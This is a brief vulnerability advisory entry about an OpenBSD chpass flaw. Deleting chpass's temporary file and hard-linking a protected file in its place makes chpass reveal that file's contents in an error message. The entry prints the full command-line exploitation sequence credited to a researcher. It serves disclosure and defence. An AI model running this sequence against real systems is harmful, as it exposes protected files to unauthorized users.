|
|
OpenBSD CHPass Temporary File Link File Content Revealing Vulnerability
The following example of exploitation was made available by Marc Bevand <bevand_m@epita.fr>: # echo "shell: secret_data" >/tmp/sec # chmod 600 /tmp/sec $ chpass # ^Z in the editor [1]+ Stopped chpass $ rm /var/tmp/pw.Loi22925 $ ln /tmp/sec /var/tmp/pw.Loi22925 $ fg # then quit the editor chpass chpass: secret_data: non-standard shell |
|
Privacy Statement |